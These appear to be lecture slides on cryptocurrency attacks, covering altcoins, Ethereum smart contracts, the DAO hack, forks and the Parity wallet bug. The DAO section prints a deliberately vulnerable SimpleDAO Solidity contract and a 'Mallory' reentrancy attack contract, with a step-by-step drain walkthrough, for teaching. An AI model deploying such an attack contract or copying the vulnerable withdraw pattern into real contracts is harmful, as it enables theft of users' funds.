More Cryptocurrency Attacks
http://blockchain.unica.it/projects/ethereum-survey/index.html http://hackingdistributed.com/2016/06/18/analysis-of-the-dao- exploit/ https://hackernoon.com/what-caused-the-latest-100-million- ethereum-bug-and-a-detection-tool-for-similar- bugs-7b80f8ab7279 Last Class
• Majority attacks
• Block withholding attacks
• Spam attacks
• Sybil attacks
• Blacklisting
• Fungibility
• Money laundering Last Class
• With the rise of 51% attacks:
• why? to what end?
• when will this stop?
• What are the points of centralization in this network?
• Is this inevitable? Cryptocurrencies
• First altcoin: Bitcoin testnet
• Second altcoin: Namecoin (DNS system)
• …
• over two thousand altcoins/tokens/etc. But… why?
• Improvements to Bitcoin
• Alternatives to Bitcoin
• Other functionality complementary to Bitcoin
• Make money for founders But… how?
• Altcoins: have their own blockchain
• Tokens: built on top of cryptocurrencies Alternative Proof of Work Mechanisms
• Cuckoo Cycle
• etc. Alternative functionality
• NameCoin: DNS system
• Ethereum: Turing complete
• ZCash/Monero/others: “Private” Namecoin
• “completes” Zooko’s Triangle
• Blockchain-based DNS
• First fork of Bitcoin
• Merge mined with Bitcoin:
• same hash function
Ethereum
• Currently the second most popular cryptocurrency
• First proposed as a system built on top of Bitcoin
• Started to create turing-complete money contracts “smart contracts”
• Ether: currency which is input/output to contracts
• Gas: execution cost of instructions Smart Contracts
• Run on blockchain and executed by all nodes
• Created by posting a transaction
• Identified by address
• Can hold, receive, and send money
• Once deployed, cannot be changed Ethereum uses
• DApps
• Distributed applications
• CryptoKitties!
• Ponzi schemes!
• Tokens
• https://coinmarketcap.com/tokens/views/all/ The DAO
• Crowdfunding platform
• Envisioned as a leaderless organization
• Anybody could hold DAO tokens
• DAO creators together agreed on rules
• Raised 12.7M Ether ($150M) Simplified DAO
• Solidity:
• high-level programming language to write smart contracts with
• python-ish
• Enter contract: donate
• Exit contract: withdraw
• Fallback option: Simplified DAO contract SimpleDAO { mapping (address => uint) public credit; function donate(address to){ credit[to] += msg.value; } function queryCredit(address to) returns (uint){ return credit[to]; } function withdraw(uint amount) { if (credit[msg.sender]>= amount) { msg.sender.call.value(amount)(); credit[msg.sender]-=amount; }}} Attack contract Mallory { SimpleDAO public dao = SimpleDAO(0x354...); address owner; function Mallory(){owner = msg.sender; } function() { dao.withdraw(dao.queryCredit(this)); } function getJackpot(){ owner.send(this.balance); } Attack
contract SimpleDAO { mapping (address => uint) public credit; function donate(address to){ credit[to] += msg.value; } function queryCredit(address to) returns (uint){ return credit[to]; }
Step 1: Attacker donates ether for Mallory. Attack contract Mallory { SimpleDAO public dao = SimpleDAO(0x354...); address owner; function Mallory(){owner = msg.sender; } function() { dao.withdraw(dao.queryCredit(this)); } function getJackpot(){ owner.send(this.balance); } Step 1: Attacker donates ether for Mallory. This triggers Mallory’s fallback. Attack
function withdraw(uint amount) { if (credit[msg.sender]>= amount) { msg.sender.call.value(amount)(); credit[msg.sender]-=amount; }
Step 2: Mallory’s fallback calls the withdraw function. Attack
function withdraw(uint amount) { if (credit[msg.sender]>= amount) { msg.sender.call.value(amount)(); credit[msg.sender]-=amount; }
Step 3: The withdraw function then invokes Mallory’s default again via call. Attack contract Mallory { SimpleDAO public dao = SimpleDAO(0x354...); address owner; function Mallory(){owner = msg.sender; } function() { dao.withdraw(dao.queryCredit(this)); } function getJackpot(){ owner.send(this.balance); } Step 4: We then attempt to withdraw again. The last call to withdraw was interrupted before it could update the credit field, so we still have ether to withdraw! Attack
• We can repeat ad nauseam until:
• contract gas is exhausted OR
• balance of DAO is zero. But wait!
7 days before drain started But wait!
5 days before drain started But wait!
• Code was attacked after it was patched.
• But how can that be?
• Remember: once deployed, cannot change Ethereum Price Shock Forks
• Fork: update in software
• Hard Fork
• requires software update; old version incompatible
• Soft Fork
• old version compatible with new software Forks
29 What to do next with Ethereum?
• Nothing
• Gas limit
• Ban spam addresses
• Soft Fork
• Hard Fork What happened next
https://www.ofnumbers.com/2016/07/28/ethereum-core-and- ethereum-classic-for-dummies/ Parity Multisig
• Ethereum Wallet
• One person “killing” a wallet killed every wallet that relied on the contract
Questions
• If we can’t secure code in a normal case, how will we be able to secure it on a blockchain?
• Do new blockchains create decentralization or centralization pressures? how?